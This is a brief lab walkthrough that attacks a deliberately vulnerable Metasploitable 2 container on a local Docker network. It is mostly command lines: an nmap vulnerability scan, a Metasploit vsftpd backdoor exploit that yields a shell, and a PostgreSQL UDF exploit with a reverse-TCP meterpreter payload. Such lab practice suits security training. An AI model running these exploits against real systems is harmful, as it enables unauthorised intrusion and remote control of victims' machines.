Metasploitable 2
Last updated
If you haven't set up Metasploitable 2 yet, you can follow my steps in the chapter Docker basics and Images.
docker ps -a
docker start meta2
docker ps
docker exec -it meta2 /bin/bash
hostname -i
sudo nmap -T5 -Pn -n -v -sS -sV --script "vuln OR default" --open -oA ./vulscan_nmap_meta2 172.17.0.2
Wait until the scan is finished, then convert the XML report to HTML:
xsltproc vulscan_nmap_meta2.xml -o vulscan_nmap_meta2.html
searchsploit vsftpd
msfconsole
search vsftpd
use 0
set rhost 172.17.0.2
exploit
We now have a bind shell:
From the vulnerability report we can see that a PostgreSQL service is running on the target system.
Let's enumerate the PostgreSQL version of our target:
use auxiliary/scanner/postgres/postgres_version
set rhosts 172.17.0.2
exploit
search postgres
use 13
info
Description: On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions.
set lhost 172.17.0.1
set rhost 172.17.0.2
(We keep the default payload, linux/x86/meterpreter/reverse_tcp.)
exploit -j
sessions
sessions -i 3